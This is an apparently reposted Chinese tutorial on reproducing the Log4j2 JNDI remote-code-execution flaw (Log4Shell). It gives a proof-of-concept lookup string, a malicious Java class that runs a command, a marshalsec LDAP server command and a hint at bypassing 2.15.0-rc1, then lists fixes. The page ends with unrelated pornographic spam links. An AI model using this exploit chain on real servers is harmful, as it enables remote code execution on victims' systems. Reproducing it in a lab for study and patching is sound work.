<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          手把手教你復現(xiàn)Log4j2漏洞,千萬別中招!

          共 321字,需瀏覽 1分鐘

           ·

          2021-12-23 00:17

          來源:blog.csdn.net/qq_40989258/article/

          details/121862363


          0x00 簡介

          ApacheLog4j2是一個開源的Java日志框架,被廣泛地應(yīng)用在中間件、開發(fā)框架與Web應(yīng)用中。

          0x01 漏洞概述

          該漏洞是由于Apache Log4j2某些功能存在遞歸解析功能,未經(jīng)身份驗證的攻擊者通過發(fā)送特定惡意數(shù)據(jù)包,可在目標服務(wù)器上執(zhí)行任意代碼。

          0x02 影響范圍

          Apache Log4j 2.x <= 2.15.0-rc1

          0x03 環(huán)境搭建

          創(chuàng)建一個新的maven項目,并導入Log4j的依賴包

          <dependency>
          ????<groupId>org.apache.logging.log4jgroupId>
          ????<artifactId>log4j-coreartifactId>
          ????<version>2.14.1version>
          dependency>

          0x04 漏洞利用

          1、使用POC測試

          import?org.apache.logging.log4j.LogManager;
          import?org.apache.logging.log4j.Logger;
          class?LogTest?{
          ????public?static?final?Logger?logger?=?LogManager.getLogger();
          ????public?static?void?main(String[]?args)?{
          ????????logger.error("${jndi:ldap://localhost:8888/Exploit}");
          ????}
          }

          2、編譯一惡意類Exploit.class

          首先新建exp.java,然后編譯為class文件

          class?Exploit?{
          ????static?{
          ????????System.err.println("Pwned");
          ????????try?{
          ????????????String?cmds?=?"calc";
          ????????????Runtime.getRuntime().exec(cmds);
          ????????}?catch?(?Exception?e?)?{
          ????????????e.printStackTrace();
          ????????}
          ????}
          }

          javac exp.java

          3、使用marshalsec-0.0.3-SNAPSHOT-all.jar本地開啟一個LDAP服務(wù)

          java?-cp?marshalsec-0.0.3-SNAPSHOT-all.jar?marshalsec.jndi.LDAPRefServer
          "http://127.0.0.1:7777/#Exploit"?8888

          4、運行poc.java,即可訪問惡意類并執(zhí)行寫在其中的"calc"命令

          結(jié)合一些其它 StrLookup 適當變形,以及配合官方測試用例中臟數(shù)據(jù)"?Type=A Type&Name=1100110&Char=!"可繞過rc1,RC2版本對此異常進行了捕獲。

          https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

          0x05 修復方式

          目前,Apache官方已發(fā)布新版本完成漏洞修復,建議用戶盡快進行自查,并及時升級至最新版本:

          https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

          建議同時采用如下臨時措施進行漏洞防范:

          1)添加jvm啟動參數(shù)-Dlog4j2.formatMsgNoLookups=true;

          2)在應(yīng)用classpath下添加log4j2.component.properties配置文件,文件內(nèi)容為log4j2.formatMsgNoLookups=true;

          3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

          4)部署使用第三方防火墻產(chǎn)品進行安全防護。

          推薦閱讀:

          世界的真實格局分析,地球人類社會底層運行原理

          不是你需要中臺,而是一名合格的架構(gòu)師(附各大廠中臺建設(shè)PPT)

          企業(yè)IT技術(shù)架構(gòu)規(guī)劃方案

          論數(shù)字化轉(zhuǎn)型——轉(zhuǎn)什么,如何轉(zhuǎn)?

          華為干部與人才發(fā)展手冊(附PPT)

          企業(yè)10大管理流程圖,數(shù)字化轉(zhuǎn)型從業(yè)者必備!

          【中臺實踐】華為大數(shù)據(jù)中臺架構(gòu)分享.pdf

          華為的數(shù)字化轉(zhuǎn)型方法論

          華為如何實施數(shù)字化轉(zhuǎn)型(附PPT)

          超詳細280頁Docker實戰(zhàn)文檔!開放下載

          華為大數(shù)據(jù)解決方案(PPT)

          瀏覽 47
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          評論
          圖片
          表情
          推薦
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  午夜福利电影在线免费观看 | 亚洲国产永久精品成人麻豆 | 在线看黄色电影 | 无码人妻精品一区二区三区99仓 | 大鸡巴操逼视频免费看 |